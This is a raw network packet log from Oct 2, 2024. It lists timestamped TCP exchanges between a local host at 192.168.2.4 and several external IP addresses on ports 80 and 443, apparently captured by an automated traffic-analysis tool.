Oct 2, 2024 09:41:16.504533052 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504551888 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504559040 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504559040 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504570961 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.504590034 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504590034 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.504616022 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505072117 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505086899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505135059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505166054 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505227089 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505242109 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505275011 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505287886 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505287886 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505290985 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505357981 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505405903 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505422115 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505438089 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505480051 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505480051 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505516052 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505533934 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505549908 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505567074 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505589962 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505599022 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505608082 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505625963 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.505631924 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505631924 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505665064 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505665064 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.505964994 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.506011009 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.506026983 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.506042957 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.506095886 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.506095886 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508440018 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508457899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508486032 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508502007 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508512974 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508512974 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508519888 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508538961 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508542061 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508542061 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508647919 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508663893 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508682013 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508692026 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508692026 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508728981 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508734941 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508734941 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508745909 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508764029 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508780956 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508797884 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508815050 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508827925 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508827925 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.508948088 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508963108 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.508987904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509004116 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509012938 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509018898 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509037971 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509043932 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509056091 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509059906 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509073973 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509080887 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509089947 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509104967 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509104967 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509109020 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509125948 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509151936 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509155989 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509166956 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509172916 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509191036 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509193897 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509208918 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509231091 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509231091 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509294987 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509311914 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509326935 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509342909 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509358883 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509368896 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509368896 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509375095 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509393930 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509412050 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509417057 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509417057 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509429932 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509449005 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509459019 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509459019 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509464979 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509490967 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509490967 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509491920 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509500980 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509511948 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509527922 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509552002 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509567976 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509572983 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509593964 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509609938 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509614944 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509627104 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509643078 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509649992 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509660006 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509671926 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509679079 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509694099 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509696960 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509708881 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509712934 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509731054 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509736061 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509736061 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509757042 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509759903 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509773970 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509778023 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509795904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509834051 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509843111 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509854078 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509881020 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.509907007 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.509972095 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510006905 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510024071 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510032892 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510065079 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510168076 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510185003 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510200024 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510217905 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510229111 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510236025 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510251045 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510255098 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510273933 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510278940 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510310888 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510344028 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510353088 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510371923 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510392904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510407925 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510423899 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510436058 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510441065 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510459900 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510469913 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510481119 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510487080 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510504007 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510510921 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510510921 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510521889 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.510531902 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510562897 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.510930061 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511001110 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511018991 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511048079 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.511064053 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.511077881 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511096001 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511111021 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.511115074 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.511136055 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.511161089 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517520905 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517560959 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517575979 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517604113 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517618895 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517635107 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517651081 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517668962 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517688036 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517704010 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517721891 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517739058 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517762899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517775059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517775059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517775059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517775059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517775059 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517781019 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517800093 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517800093 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517800093 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517852068 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517868042 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517883062 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517893076 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517903090 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517920017 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517937899 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517942905 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517942905 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517982960 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.517987013 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.517987013 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518002033 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518027067 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518043041 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518066883 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518066883 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518137932 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518166065 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518182039 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518199921 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518208027 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518208027 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518218994 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518235922 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518258095 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518258095 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518274069 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518290997 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.518316984 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518316984 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.518378019 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.584995031 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585017920 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585026026 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585033894 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585042000 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585048914 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585057020 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585068941 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585088015 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585095882 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585103035 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585109949 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585117102 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585124016 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585134029 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585141897 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585149050 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585155964 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585164070 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585170984 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585177898 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585194111 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585338116 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585367918 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585485935 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585510969 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585526943 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585531950 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585545063 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585570097 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585576057 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585583925 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585592985 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585609913 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585621119 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585627079 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585647106 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585648060 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585690022 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585736990 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585753918 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585769892 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585788965 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585799932 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585817099 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585827112 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585827112 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585834026 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585850954 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585870028 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.585876942 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.585912943 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.586214066 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586237907 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586255074 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586271048 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586283922 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.586289883 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586308002 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.586312056 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.586348057 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.886748075 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:16.886749029 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:16.891807079 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:16.891839981 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:18.122143984 CEST	80	49735	41.216.188.190	192.168.2.4
Oct 2, 2024 09:41:18.171859026 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:18.176214933 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.176302910 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:18.176398039 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.176758051 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.176791906 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:18.645734072 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:18.645925045 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.649285078 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.649313927 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:18.649581909 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:18.659065962 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:18.699414015 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:19.087284088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:19.358525991 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:19.358576059 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:19.358855963 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:19.359508991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:19.359591961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:19.364811897 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:19.364811897 CEST	49748	443	192.168.2.4	104.26.2.46
Oct 2, 2024 09:41:19.364878893 CEST	443	49748	104.26.2.46	192.168.2.4
Oct 2, 2024 09:41:19.364914894 CEST	443	49748	104.26.2.46	192.168.2.4
